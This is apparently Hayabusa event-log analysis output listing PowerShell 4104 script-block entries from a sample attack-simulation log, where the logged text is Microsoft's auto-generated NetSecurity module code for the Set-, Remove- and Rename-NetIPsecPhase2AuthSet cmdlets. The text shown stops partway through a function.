[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] 
[Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
